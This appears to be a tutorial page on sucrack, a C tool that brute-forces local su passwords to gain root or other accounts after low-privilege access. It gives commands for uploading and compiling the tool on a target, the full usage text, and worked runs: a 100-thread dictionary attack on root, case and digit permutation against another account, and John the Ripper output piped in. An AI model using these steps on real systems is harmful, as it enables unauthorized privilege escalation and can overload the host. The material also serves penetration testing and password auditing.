This tool comes in handy when you’ve gained access to a low-privilege user account but are allowed to su to other users. Many su implementations require a pseudo terminal to be attached in order to take the password from the user. This can’t be easily achieved with a simple shell script. This tool, written in C, is highly efficient and can attempt multiple logins at the same time.
Please be advised that using this tool will take a lot of the CPU performance and fill up the logs quite quickly. sucrack is so far known to be running on FreeBSD, NetBSD, Linux.
First of all, you’ll want to upload the source to the target system (assuming you don’t have a pre-compiled copy that will work):
$ tar xfz sucrack-1.2.3.tar.gz $ cd sucrack-1.2.3 $ ./configure $ make $ cd src
Obviously, you won’t have the luxury of running “make install” yet as you’re not root.
sucrack 1.2.3 (LINUX) - the su cracker Copyright (C) 2006 Nico Leidecker; email@example.com Usage: ./sucrack [-char] [-w num] [-b size] [-s sec] [-u user] [-l rules] wordlist The word list can either be an existing file or stdin. In that case, use '-' instead of a file name Options: h : print this message a : ansi escape codes not available. Use the --enable-statistics configure flag. s sec : statistics display interval not available. Use the --enable-statistics configure flag. c : only print statistics if a key other than `q' is pressed. (default) r : enable rewriter w num : number of worker threads running with b size : size of word list buffer u user : user account to su to l rules : specify rewriting rules; rules can be: A = all characters upper case F = first character upper case L = last character upper case a = all characters lower case f = first character lower case l = last character lower case D = prepend digit d = append digit e = 1337 characters x = all rules Environment Variables: SUCRACK_SU_PATH : The path to su (usually /bin/su or /usr/bin/su) SUCRACK_AUTH_FAILURE : The message su returns on an authentication failure (like "su: Authentication failure" or "su: Sorry") SUCRACK_AUTH_SUCCESS : The message that indicates an authentication success. This message must not be a password listed in the wordlist (default is "SUCRACK_SUCCESS") Example: export SUCRACK_AUTH_SUCCESS="sucrack_says_hello" ./sucrack -a -w 20 -s 10 -u root -rl AFLafld dict.txt
Running a Dictionary Attack on an Account
On my dual-core test system, this 100-thread attack ran at around 50 guesses per second.
$ ./sucrack -w 100 -u root dict.txt password is: test123
Bear in mind that if the target system has little memory or little CPU power, running 100 threads may DoS the system, so be careful.
Permuting the Dictionary
Check out the Usage page for list of options to alter the case, append digits, etc. to the dictionary. In the example below, we try each word in lower case and append a digit:
$ ./sucrack -w 100 -r -l ad -u smbguest dict.txt password is: test123
Reading Passwords from STDIN
Besides of getting passwords from a dictionary or in the incremental mode, you can use the password generator of your choice and feed sucrack with passwords. John the Ripper’s great password generator can be used this way for instance:
$ john --stdout --incremental | sucrack -